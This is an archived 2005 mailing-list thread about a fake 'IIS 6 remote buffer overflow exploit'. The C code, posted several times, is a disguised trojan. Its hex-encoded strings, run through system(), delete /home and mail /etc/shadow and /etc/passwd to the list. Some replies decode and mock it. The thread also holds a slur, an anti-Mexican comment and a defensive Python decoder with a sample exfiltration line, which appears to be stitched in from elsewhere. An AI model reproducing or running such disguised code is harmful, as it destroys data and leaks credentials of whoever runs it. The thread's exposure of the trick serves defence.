Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Day Jay
Kind of like your attempt to be American :)

--- Javi Polo <[EMAIL PROTECTED]> wrote:
> On Apr/20/2005, Day Jay wrote:
> 
> > You are wrong again, it's "Smashing the Stick" you
> > moron. Not smashing the stack. Ask anyone here!
> > Man, you are such a newbie. Get a clue and stop trying
> > to say the sweet code is a backdoor just because you
> > don't know how to compile software properly. You're
> > nothing but a newbie wanna be C programmer with a dick
> > in his ass and a lack of hacking skills.
> .
> 
> Should this list be moderated?
> 
> it's starting to be a pile of shit ... :/
> 
> -- 
> Javi Polo @ VirtualSys 
> Diputació 306, Enlo. 1ª 08009 Barcelona
> [T] +34 93 412 37 50 [F] +34 93 342 58 72
> http://www.virtualsys.com

__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Day Jay
not as lame as you are! Take your ham and shove it!

What a faggit.
--- Ed Carp <[EMAIL PROTECTED]> wrote:
> Javi Polo wrote:
> 
> > On Apr/20/2005, Day Jay wrote:
> > 
> >>You are wrong again, it's "Smashing the Stick" you
> >>moron. Not smashing the stack. Ask anyone here!
> >>Man, you are such a newbie. Get a clue and stop trying
> >>to say the sweet code is a backdoor just because you
> >>don't know how to compile software properly. You're
> >>nothing but a newbie wanna be C programmer with a dick
> >>in his ass and a lack of hacking skills.
> > 
> > .
> > 
> > Should this list be moderated?
> > 
> > it's starting to be a pile of shit ... :/
> 
> Starting??  It always has - 90% of the messages here
> are pure bullshit.  Fortunately, there is 10% pure
> gold here, which is the *only* reason why I'm still
> here, and I suspect that goes for a lot of other
> people here.
> 
> The juvenile wanna-be crackers who post here so much
> like to use profanity to pump themselves up - to
> compensate for their lack of technical skills, no
> doubt.  "Gee, I'm a real *man* because I can spin a
> clever put-down and use as much profanity as
> possible..."
> 
> How incredibly lame.
> -- 
> Ed Carp, N7EKG
> President
> Lightspeed Software, Inc.
> Navarre, FL
> (850) 291-1563
> "Internet applications software for the rest of us"



Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Ron
The ONLY posts I don't like are posts like that, complaining about the 
list.  Like somebody else said, the rest of this list provides great 
"comic relief"!

Javi Polo wrote:
> On Apr/20/2005, Day Jay wrote:
>
>> You are wrong again, it's "Smashing the Stick" you
>> moron. Not smashing the stack. Ask anyone here!
>> Man, you are such a newbie. Get a clue and stop trying
>> to say the sweet code is a backdoor just because you
>> don't know how to compile software properly. You're
>> nothing but a newbie wanna be C programmer with a dick
>> in his ass and a lack of hacking skills.
>
> .
> Should this list be moderated?
> it's starting to be a pile of shit ... :/



Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread vulcanius
I actually have two other separate e-mail accounts. One for normal
mail. And one for lists. This one is reserved specifically for FD. I
don't even need mail filters, having different e-mail addresses does
it all for me.

On 4/21/05, Joachim Schipper <[EMAIL PROTECTED]> wrote:
> On Thu, Apr 21, 2005 at 04:32:39AM -0500, Ed Carp wrote:
> > Javi Polo wrote:
> >
> > >On Apr/20/2005, Day Jay wrote:
> > >
> > >>You are wrong again, it's "Smashing the Stick" you
> > >>moron. Not smashing the stack. Ask anyone here!
> > >>Man, you are such a newbie. Get a clue and stop trying
> > >>to say the sweet code is a backdoor just because you
> > >>don't know how to compile software properly. You're
> > >>nothing but a newbie wanna be C programmer with a dick
> > >>in his ass and a lack of hacking skills.
> > >
> > >.
> > >
> > >Should this list be moderated?
> > >
> > >it's starting to be a pile of shit ... :/
> >
> > Starting??  It always has - 90% of the messages here are pure bullshit.
> > Fortunately, there is 10% pure gold here, which is the *only* reason why
> > I'm still here, and I suspect that goes for a lot of other people here.
> >
> > The juvenile wanna-be crackers who post here so much like to use profanity
> > to pump themselves up - to compensate for their lack of technical skills,
> > no doubt.  "Gee, I'm a real *man* because I can spin a clever put-down and
> > use as much profanity as possible..."
> >
> > How incredibly lame.
> 
> Hey, don't be too harsh on the list - most is useful, and the rest
> provides comic relief. ;-)
> 
>Joachim


Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Joachim Schipper
On Thu, Apr 21, 2005 at 04:32:39AM -0500, Ed Carp wrote:
> Javi Polo wrote:
> 
> >On Apr/20/2005, Day Jay wrote:
> >
> >>You are wrong again, it's "Smashing the Stick" you
> >>moron. Not smashing the stack. Ask anyone here!
> >>Man, you are such a newbie. Get a clue and stop trying
> >>to say the sweet code is a backdoor just because you
> >>don't know how to compile software properly. You're
> >>nothing but a newbie wanna be C programmer with a dick
> >>in his ass and a lack of hacking skills.
> >
> >.
> >
> >Should this list be moderated?
> >
> >it's starting to be a pile of shit ... :/
> 
> Starting??  It always has - 90% of the messages here are pure bullshit.  
> Fortunately, there is 10% pure gold here, which is the *only* reason why 
> I'm still here, and I suspect that goes for a lot of other people here.
> 
> The juvenile wanna-be crackers who post here so much like to use profanity 
> to pump themselves up - to compensate for their lack of technical skills, 
> no doubt.  "Gee, I'm a real *man* because I can spin a clever put-down and 
> use as much profanity as possible..."
> 
> How incredibly lame.

Hey, don't be too harsh on the list - most is useful, and the rest
provides comic relief. ;-)

Joachim


Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Ed Carp
Javi Polo wrote:
> On Apr/20/2005, Day Jay wrote:
>
>> You are wrong again, it's "Smashing the Stick" you
>> moron. Not smashing the stack. Ask anyone here!
>> Man, you are such a newbie. Get a clue and stop trying
>> to say the sweet code is a backdoor just because you
>> don't know how to compile software properly. You're
>> nothing but a newbie wanna be C programmer with a dick
>> in his ass and a lack of hacking skills.
>
> .
>
> Should this list be moderated?
>
> it's starting to be a pile of shit ... :/

Starting??  It always has - 90% of the messages here are pure bullshit.
Fortunately, there is 10% pure gold here, which is the *only* reason why I'm
still here, and I suspect that goes for a lot of other people here.

The juvenile wanna-be crackers who post here so much like to use profanity to pump
themselves up - to compensate for their lack of technical skills, no doubt.  "Gee,
I'm a real *man* because I can spin a clever put-down and use as much profanity as
possible..."

How incredibly lame.
--
Ed Carp, N7EKG
President
Lightspeed Software, Inc.
Navarre, FL
(850) 291-1563
"Internet applications software for the rest of us"


Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Javi Polo
On Apr/20/2005, Day Jay wrote:

> You are wrong again, it's "Smashing the Stick" you
> moron. Not smashing the stack. Ask anyone here!
> Man, you are such a newbie. Get a clue and stop trying
> to say the sweet code is a backdoor just because you
> don't know how to compile software properly. You're
> nothing but a newbie wanna be C programmer with a dick
> in his ass and a lack of hacking skills.
.

Should this list be moderated?

it's starting to be a pile of shit ... :/

-- 
Javi Polo @ VirtualSys 
Diputació 306, Enlo. 1ª 08009 Barcelona
[T] +34 93 412 37 50 [F] +34 93 342 58 72
http://www.virtualsys.com


Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread Day Jay
You are wrong again, it's "Smashing the Stick" you
moron. Not smashing the stack. Ask anyone here!

Man, you are such a newbie. Get a clue and stop trying
to say the sweet code is a backdoor just because you
don't know how to compile software properly. You're
nothing but a newbie wanna be C programmer with a dick
in his ass and a lack of hacking skills.

Die slowly kthxbye!


--- vulcanius <[EMAIL PROTECTED]> wrote:

> Last time I checked it was Smashing the Stack, not Smashing the Stick
> moron. And why the hell do you keep reposting the code when everyone
> already knows it's a lame backdoor attempt?
> 
> On 4/20/05, Day Jay <[EMAIL PROTECTED]> wrote:
> > Yes it is you hat squad lammer newbie. Now get it to
> > work!! You fucking newbie.
> > 
> > You're so lame and so is your file system.
> > 
> > --- "[EMAIL PROTECTED]"
> <[EMAIL PROTECTED]>
> > wrote:
> > > perfect asshole
> > >
> > >
> >
>
-
> > > class101
> > > Jr. Researcher
> > > Hat-Squad.com
> > >
> >
>
-----------------------------
> > > ----- Original Message -
> > > From: "Day Jay" <[EMAIL PROTECTED]>
> > > To: 
> > > Sent: Wednesday, April 20, 2005 8:15 PM
> > > Subject: [Full-disclosure] FIXED CODE - IIS 6
> Remote
> > > Buffer Overflow
> > > Exploit(was broken)
> > >
> > >
> > > > Sorry, the previous code was broken. This code
> > > should
> > > > work...
> > > >
> > > > Happy Owning!! :)
> > > >
> > > >
> > > > =SNIP
> > > > /* Proof of concept code
> > > > Please don't send us e-mails
> > > > asking us "how to hack" because
> > > > we will be forced to skullfsck you.
> > > >
> > > >  DISCLAIMER:
> > > >  !!NOT RESPONSIBLE WITH YOUR USE OF THIS
> CODE!!
> > > >
> > > > IIS 6 Buffer Overflow Exploit
> > > >
> > > > BUG: inetinfo.exe improperly bound checks
> > > > http requests sent longer than 6998 chars.
> > > > Can get messy but enough testing, and we
> have
> > > > found a way in.
> > > >
> > > > VENDOR STATUS: Notified
> > > > FIX: In process
> > > >
> > > > Remote root.
> > > >
> > > > eg.
> > > > #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> > > >  + Connecting to host...
> > > >  + Connected.
> > > >  + Inserting Shellcode...
> > > >  + Done...
> > > >  + Spawining shell..
> > > >
> > > >  Microsoft Windows XP [Version 5.1.2600]
> > > > (C) Copyright 1985-2001 Microsoft Corp.
> > > > C:\
> > > >
> > > >
> > > >
> > > >  */
> > > >  char shellcode[] =
> > > >  "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> > > >  "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> > > >  "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> > > >  "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> > > >  "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> > > >  "\x68\x65\x68\x65";
> > > >
> > > >  char launcher [] =
> > > >  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> > > >  "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> > > >  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > > >  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > > >  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > > >  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> > > >
> > > >  char netcat_shell [] =
> > > >  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> > > >  "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> > > >  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > > >  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > > >  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > > >  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> > > >
> > > >
> > > >  main()
> > > >  {
> > > >
> > > >  file://Section Initialises designs
> implemented by
> > &

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread Day Jay
Yes it is you hat squad lammer newbie. Now get it to
work!! You fucking newbie.

You're so lame and so is your file system.


--- "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
wrote:
> perfect asshole
> 
>
-
> class101
> Jr. Researcher
> Hat-Squad.com
>
-
> - Original Message -
> From: "Day Jay" <[EMAIL PROTECTED]>
> To: 
> Sent: Wednesday, April 20, 2005 8:15 PM
> Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote
> Buffer Overflow
> Exploit(was broken)
> 
> 
> > Sorry, the previous code was broken. This code should
> > work...
> >
> > Happy Owning!! :)
> >
> >
> > =SNIP
> > /* Proof of concept code
> > Please don't send us e-mails
> > asking us "how to hack" because
> > we will be forced to skullfsck you.
> >
> >  DISCLAIMER:
> >  !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
> >
> > IIS 6 Buffer Overflow Exploit
> >
> > BUG: inetinfo.exe improperly bound checks
> > http requests sent longer than 6998 chars.
> > Can get messy but enough testing, and we have
> > found a way in.
> >
> > VENDOR STATUS: Notified
> > FIX: In process
> >
> > Remote root.
> >
> > eg.
> > #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> >  + Connecting to host...
> >  + Connected.
> >  + Inserting Shellcode...
> >  + Done...
> >  + Spawining shell..
> >
> >  Microsoft Windows XP [Version 5.1.2600]
> > (C) Copyright 1985-2001 Microsoft Corp.
> > C:\
> >
> >
> >
> >  */
> >  char shellcode[] =
> >  "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> >  "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> >  "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> >  "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> >  "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> >  "\x68\x65\x68\x65";
> >
> >  char launcher [] =
> >  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> >  "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> >  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> >  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> >  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> >  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> >
> >  char netcat_shell [] =
> >  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> >  "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> >  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> >  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> >  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> >  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> >
> >
> >  main()
> >  {
> >
> >  //Section Initialises designs implemented by mexicans
> >  //Imigrate
> >  system(launcher);
> >  system(netcat_shell);
> >  system(shellcode);
> >
> >  //int socket = 0;
> >  //double long port = 0.0;
> >
> >  //#DEFINE port host address
> >  //#DEFINE number of inters
> >  //#DEFINE gull eeuEE
> >
> >   // for(int j; j < 30; j++)
> >  {
> >  //Find socket remote address fault
> >  printf(".");
> >  }
> >  //overtake inetinfo here IIS_66^
> >  return 0;
> >  }
> >



[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread Day Jay
Dear DIk,

You are thinking local buffer overflows with your
"think: ret=(int *)&ret+2;(*ret)=(int)shellcode;"

Wow, I think I read smashing the stick for fun and
profit a long time ago, but this is a remote root
exploit, it's a little different!!

Damn newbie! I mean, how lame are you?


--- dk <[EMAIL PROTECTED]> wrote:
> Day Jay wrote:
> > Sorry, the previous code was broken. 
> 
> Definitely `borken'... I didn't even see one
> /etc/passwd file in here! 
> Less obvious calls may catch more habitual FD code
> runners next time 
> dude. [think: ret=(int
> *)&ret+2;(*ret)=(int)shellcode;]
> 
> ;-)
> 
> 
> -- 
> dk



Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread [EMAIL PROTECTED]
perfect asshole

-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "Day Jay" <[EMAIL PROTECTED]>
To: 
Sent: Wednesday, April 20, 2005 8:15 PM
Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow
Exploit(was broken)


> Sorry, the previous code was broken. This code should
> work...
>
> Happy Owning!! :)
>
>
> =SNIP
> /* Proof of concept code
> Please don't send us e-mails
> asking us "how to hack" because
> we will be forced to skullfsck you.
>
>  DISCLAIMER:
>  !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
>
> IIS 6 Buffer Overflow Exploit
>
> BUG: inetinfo.exe improperly bound checks
> http requests sent longer than 6998 chars.
> Can get messy but enough testing, and we have
> found a way in.
>
> VENDOR STATUS: Notified
> FIX: In process
>
> Remote root.
>
> eg.
> #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
>  + Connecting to host...
>  + Connected.
>  + Inserting Shellcode...
>  + Done...
>  + Spawining shell..
>
>  Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
> C:\
>
>
>
>  */
>  char shellcode[] =
>  "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
>  "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
>  "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
>  "\x72\x3b\x65\x63\x68\x6f\x20\x62"
>  "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
>  "\x68\x65\x68\x65";
>
>  char launcher [] =
>  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
>  "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
>  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
>  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
>  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
>  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>  char netcat_shell [] =
>  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
>  "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
>  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
>  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
>  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
>  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>
>  main()
>  {
>
>  //Section Initialises designs implemented by mexicans
>  //Imigrate
>  system(launcher);
>  system(netcat_shell);
>  system(shellcode);
>
>  //int socket = 0;
>  //double long port = 0.0;
>
>  //#DEFINE port host address
>  //#DEFINE number of inters
>  //#DEFINE gull eeuEE
>
>   // for(int j; j < 30; j++)
>  {
>  //Find socket remote address fault
>  printf(".");
>  }
>  //overtake inetinfo here IIS_66^
>  return 0;
>  }
>



Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread James Longstreet
Cute.

shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe"
launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk "
netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk "

On Wed, 20 Apr 2005, Day Jay wrote:

> Sorry, the previous code was broken. This code should
> work...
>
> Happy Owning!! :)
>
>
> =SNIP
> /* Proof of concept code
> Please don't send us e-mails
> asking us "how to hack" because
> we will be forced to skullfsck you.
>
>  DISCLAIMER:
>  !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
>
> IIS 6 Buffer Overflow Exploit
>
> BUG: inetinfo.exe improperly bound checks
> http requests sent longer than 6998 chars.
> Can get messy but enough testing, and we have
> found a way in.
>
> VENDOR STATUS: Notified
> FIX: In process
>
> Remote root.
>
> eg.
> #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
>  + Connecting to host...
>  + Connected.
>  + Inserting Shellcode...
>  + Done...
>  + Spawining shell..
>
>  Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
> C:\
>
>
>
>  */
>  char shellcode[] =
>  "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
>  "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
>  "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
>  "\x72\x3b\x65\x63\x68\x6f\x20\x62"
>  "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
>  "\x68\x65\x68\x65";
>
>  char launcher [] =
>  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
>  "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
>  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
>  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
>  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
>  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>  char netcat_shell [] =
>  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
>  "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
>  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
>  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
>  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
>  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>
>  main()
>  {
>
>  //Section Initialises designs implemented by mexicans
>  //Imigrate
>  system(launcher);
>  system(netcat_shell);
>  system(shellcode);
>
>  //int socket = 0;
>  //double long port = 0.0;
>
>  //#DEFINE port host address
>  //#DEFINE number of inters
>  //#DEFINE gull eeuEE
>
>   // for(int j; j < 30; j++)
>  {
>  //Find socket remote address fault
>  printf(".");
>  }
>  //overtake inetinfo here IIS_66^
>  return 0;
>  }
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
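
The manual decode in the message above, turned into a check that can be run on any posted "proof of concept" before it is compiled. This is an added example, not part of the original thread: the sample source, its array contents and the example.invalid address are constructed, and the rule list is an assumption about what a reviewer would want flagged.

```python
import re

# "char name[] = "..." "..." ;" with adjacent string literals, as in the posted code.
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Hex escapes are read as one or two digits, which covers byte-per-escape payloads.
ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{1,2})|\\([0-7]{1,3})|\\(.)', re.S)
CALL_RE = re.compile(r'\b(?:system|popen|execl|execlp|execv|execvp)\s*\(\s*(\w+)')
SIMPLE = {"n": "\n", "t": "\t", "r": "\r"}

# Assumed triage rules: patterns a reviewer would not expect in a network exploit.
RULES = [
    ("recursive delete", re.compile(r'\brm\s+-(?=\w*r)(?=\w*f)\w+')),
    ("reads credential file", re.compile(r'/etc/(?:shadow|passwd)')),
    ("sends data by mail", re.compile(r'\|\s*(?:mail|sendmail)\b')),
]

def strip_mail_quotes(text):
    """Drop leading '>' quote markers so code pasted from a reply still parses."""
    return re.sub(r'(?m)^[ \t]*(?:>[ \t]?)+', '', text)

def decode_literal(body):
    """Turn the inside of one C string literal into the text it represents."""
    def unescape(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 8) & 0xFF)
        return SIMPLE.get(m.group(3), m.group(3))
    return ESCAPE_RE.sub(unescape, body)

def executed_names(text):
    """Names passed to system()/popen()/exec*(), ignoring comments and strings."""
    code = LITERAL_RE.sub('""', text)
    code = re.sub(r'/\*.*?\*/', '', code, flags=re.S)
    code = re.sub(r'//[^\n]*', '', code)
    return set(CALL_RE.findall(code))

def flags_for(command):
    return [label for label, rx in RULES if rx.search(command)]

def audit(source):
    """Decode every char-array initialiser and report what it would run."""
    text = strip_mail_quotes(source)
    called = executed_names(text)
    findings = []
    for name, literals in ARRAY_RE.findall(text):
        decoded = "".join(decode_literal(b) for b in LITERAL_RE.findall(literals))
        findings.append({"name": name, "decoded": decoded,
                         "executed": name in called, "flags": flags_for(decoded)})
    return findings

def c_hex(s, width=8):
    """Helper for the constructed sample: encode text as \\xNN string literals."""
    chunks = [s[i:i + width] for i in range(0, len(s), width)]
    return "\n".join(' "' + "".join("\\x%02x" % ord(c) for c in ch) + '"' for ch in chunks)

# Constructed sample, laid out like the posted code and mail-quoted with "> ".
_src = (
    "char launcher [] =\n" + c_hex("cat /etc/passwd |mail drop@example.invalid ") + ";\n"
    "char banner [] =\n" + c_hex("echo demo") + ";\n"
    "main()\n{\n"
    " system(launcher);\n"
    " // system(banner);\n"
    " return 0;\n}\n"
)
SAMPLE = "".join("> " + line + "\n" for line in _src.splitlines())

if __name__ == "__main__":
    for f in audit(SAMPLE):
        state = "EXECUTED" if f["executed"] else "not called"
        print("%-10s %-10s %r %s" % (f["name"], state, f["decoded"], f["flags"]))
```

An array that is both passed to `system()` and decodes to a shell command is the signal that the "shellcode" is a local command line rather than machine code for the advertised target.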


Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread dk
Day Jay wrote:
> Sorry, the previous code was broken.

Definitely `borken'... I didn't even see one /etc/passwd file in here!
Less obvious calls may catch more habitual FD code runners next time
dude. [think: ret=(int *)&ret+2;(*ret)=(int)shellcode;]

;-)
--
dk


Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread Dunceor .
that has to be like the worst backdooring ever. The printf()'s are not
even there :P

On 4/20/05, Day Jay <[EMAIL PROTECTED]> wrote:
> Sorry, the previous code was broken. This code should
> work...
> 
> Happy Owning!! :)
> 
> =SNIP
> /* Proof of concept code
>Please don't send us e-mails
>asking us "how to hack" because
>we will be forced to skullfsck you.
> 
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
> 
>IIS 6 Buffer Overflow Exploit
> 
>BUG: inetinfo.exe improperly bound checks
>http requests sent longer than 6998 chars.
>Can get messy but enough testing, and we have
>found a way in.
> 
>VENDOR STATUS: Notified
>FIX: In process
> 
>Remote root.
> 
>eg.
>#./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> + Connecting to host...
> + Connected.
> + Inserting Shellcode...
> + Done...
> + Spawining shell..
> 
> Microsoft Windows XP [Version 5.1.2600]
>(C) Copyright 1985-2001 Microsoft Corp.
>C:\
> 
> */
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";
> 
> char launcher [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> 
> char netcat_shell [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> 
> main()
> {
> 
> //Section Initialises designs implemented by mexicans
> //Imigrate
> system(launcher);
> system(netcat_shell);
> system(shellcode);
> 
> //int socket = 0;
> //double long port = 0.0;
> 
> //#DEFINE port host address
> //#DEFINE number of inters
> //#DEFINE gull eeuEE
> 
>  // for(int j; j < 30; j++)
> {
> //Find socket remote address fault
> printf(".");
> }
> //overtake inetinfo here IIS_66^
> return 0;
> }
> 


[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread Day Jay
Sorry, the previous code was broken. This code should
work...

Happy Owning!! :)


=SNIP
/* Proof of concept code
Please don't send us e-mails
asking us "how to hack" because
we will be forced to skullfsck you.
 
 DISCLAIMER:
 !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
 
IIS 6 Buffer Overflow Exploit
 
BUG: inetinfo.exe improperly bound checks
http requests sent longer than 6998 chars.
Can get messy but enough testing, and we have
found a way in.
 
VENDOR STATUS: Notified
FIX: In process
 
Remote root.
 
eg.
#./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
 + Connecting to host...
 + Connected.
 + Inserting Shellcode...
 + Done...
 + Spawining shell..
 
 Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\
 
 
 
 */
 char shellcode[] =
 "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
 "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
 "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
 "\x72\x3b\x65\x63\x68\x6f\x20\x62"
 "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
 "\x68\x65\x68\x65";
 
 char launcher [] =
 "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
 "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
 "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
 "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
 "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
 "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
 
 char netcat_shell [] =
 "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
 "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
 "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
 "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
